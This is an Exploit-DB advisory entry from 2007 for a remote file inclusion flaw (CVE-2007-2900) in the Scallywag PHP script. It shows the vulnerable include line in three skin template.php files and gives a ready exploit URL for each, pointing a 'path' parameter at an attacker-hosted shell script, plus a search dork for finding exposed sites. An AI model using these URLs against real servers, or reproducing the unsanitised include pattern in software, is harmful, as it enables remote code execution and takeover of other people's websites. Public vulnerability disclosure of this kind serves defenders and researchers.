Scallywag template.php path Remote File Inclusion Vulnerabilities

2007-05-23T00:00:00
ID EDB-ID:3972
Type exploitdb
Reporter Mehmet Ince
Modified 2007-05-23T00:00:00

Description

Scallywag (template.php path) Remote File Inclusion Vulnerabilities. CVE-2007-2900. Webapps exploit for php platform

                                        
                                            ##############################################################################################
#Scallywag  <=  Remote File Inclusion Vulnerability                                          #
#                                                                                            # 
#Dork:"Powered by Scallywag"                                                                 #
#                                                                                            #
#                                                                                            # 
##############################################################################################
#Vuln Code                                                                                   #  
#                                                                                            # 
#ERROR1:skin/dark/template.php                                                               # 
#                                                                                            # 
# <?php                                                                                      # 
# include("$path/source/top.txt"); <<< RFI CODE                                              # 
#                                                                                            # 
#                                                                                            # 
#BUG1:                                                                                       # 
#                                                                                            # 
#Example1:http://victim.com/path/skin/dark/template.php?path=[[Sh3LL Script]]                #
############################################################################################## 
#                                                                                            # 
#ERROR2:skin/gold/template.php                                                               # 
#                                                                                            # 
# <?php                                                                                      # 
# include("$path/source/top.txt"); <<< RFI CODE                                              # 
#                                                                                            # 
#                                                                                            # 
#BUG2:                                                                                       # 
#                                                                                            # 
#Example1:http://victim.com/path/skin/gold/template.php?path=[[Sh3LL Script]]                #
##############################################################################################
#                                                                                            # 
#ERROR3:skin/original/template.php                                                           # 
#                                                                                            # 
# <?php                                                                                      # 
# include("$path/source/top.txt"); <<< RFI CODE                                              #
#                                                                                            # 
#                                                                                            # 
#BUG3:                                                                                       # 
#                                                                                            # 
#Example1: http://victim.com/path/skin/original/template.php?path=[[Sh3LL Script]]           #
##############################################################################################
#                                                                                            # 
#Script Download                                                                             # 
##############################################################################################
#                                                                                            # 
#http://www.woweb.ru/load/82-1-0-3791                                                        # 
#                                                                                            # 
############################################################################################## 
#                                                                                            # 
#Cyber-Security                                                                              # 
#                                                                                            # 
##############################################################################################
##############################################################################################

# milw0rm.com [2007-05-23]